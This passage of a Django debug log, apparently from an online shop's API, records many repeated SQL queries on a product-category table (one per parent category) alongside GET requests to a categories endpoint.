(0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:20,675 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:20,677 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-16 07:10:20,681 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:20,683 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:20,686 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:20,690 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) [16/Dec/2019 07:10:20] "GET /api/v1/categories/1 HTTP/1.0" 200 877 DEBUG 2019-12-16 07:10:20,693 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:20,695 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:20,697 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:20,700 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:20,702 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:20,705 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:20,707 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:20,710 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:20,713 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:20,716 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:20] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:28,541 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:28,548 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:28,551 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:28,553 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:10:28,557 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:10:28,559 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:10:28,561 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:10:28,564 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:10:28,566 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:10:28,569 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:10:28,571 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:10:28,574 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:10:28,576 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:10:28,578 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:10:28,582 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:10:28,584 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:10:28,586 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:10:28,588 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:10:28,591 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:10:28,594 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:10:28,597 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:10:28,599 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:10:28,601 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:10:28,603 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:10:28,606 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:10:28,609 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:10:28,611 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:10:28,614 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:10:28,616 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:10:28,618 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:10:28,622 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:10:28,624 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:10:28,626 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:10:28,628 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:10:28,631 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:10:28,635 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:10:28,637 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:10:28,639 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:10:28,641 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:10:28,644 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:10:28,647 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:10:28,650 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:10:28,652 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:10:28,654 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:10:28,657 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:10:28,660 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:10:28] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:10:32,470 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:10:32,477 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:10:32,481 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-16 07:10:32,485 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:10:32,487 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 